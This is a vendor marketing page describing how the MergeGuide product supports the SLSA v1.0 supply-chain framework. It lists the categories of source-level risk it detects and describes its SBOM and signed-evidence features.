Supply-chain Levels for Software Artifacts (SLSA) is a security framework for preventing tampering with software during build and release. MergeGuide addresses the source and build integrity requirements in SLSA v1.0 — enforcing code-level controls that protect against supply chain attacks at the source.
SLSA v1.0 defines four levels of supply chain security maturity. SLSA Level 1 requires build provenance — documentation of how software was produced. Level 2 adds hosted build platforms. Level 3 requires hardened builds with additional protections.
Before any of these build-level controls matter, the source code must be secure. Injecting malicious code into a dependency, committing secrets to repositories, or introducing vulnerabilities at the PR level can undermine even a fully SLSA Level 3 build pipeline. MergeGuide addresses supply chain risk at the source layer.
MergeGuide includes policies that guide implementation of SLSA source and software security requirements — detecting code patterns that create supply chain risk before they enter the build pipeline, with immutable evidence artifacts for provenance documentation.
MergeGuide templates cover key supply chain security requirements at the code level:
| Supply Chain Risk | What MergeGuide Detects | Severity |
|---|---|---|
| Credential compromise | Hardcoded secrets, API keys, and credentials committed to source repositories | Critical |
| Dependency confusion | Dependency references that could be susceptible to namespace confusion attacks | High |
| Build script injection | Unsafe patterns in CI/CD scripts that could enable pipeline compromise | High |
| Malicious code patterns | Exfiltration patterns and unusual network calls in build-time code | Critical |
| Force push to protected branches | CI scripts attempting force pushes that could overwrite signed commits | High |
| Unsigned dependency usage | Dependency pinning practices that reduce provenance verifiability | Medium |
| Insecure IaC | Infrastructure-as-code patterns that reduce build environment integrity | High |
SLSA and supply chain security requirements increasingly demand Software Bill of Materials. MergeGuide generates CycloneDX 1.5 and SPDX 2.3 SBOMs at build time — providing the component inventory required for supply chain risk analysis and vulnerability tracking.
SLSA provenance requires tamper-evident records of how software was built. MergeGuide's signed evidence artifacts provide cryptographic proof that code was validated against security policies before entering the build pipeline — complementing build provenance documentation.
SLSA and NIST SSDF share overlapping supply chain security requirements. MergeGuide's PolicyMerge resolves overlapping controls between SLSA, SSDF, and other active frameworks — a single assessment covers all supply chain requirements simultaneously.
See how MergeGuide addresses SLSA source integrity requirements and generates provenance-supporting evidence artifacts in a live demo.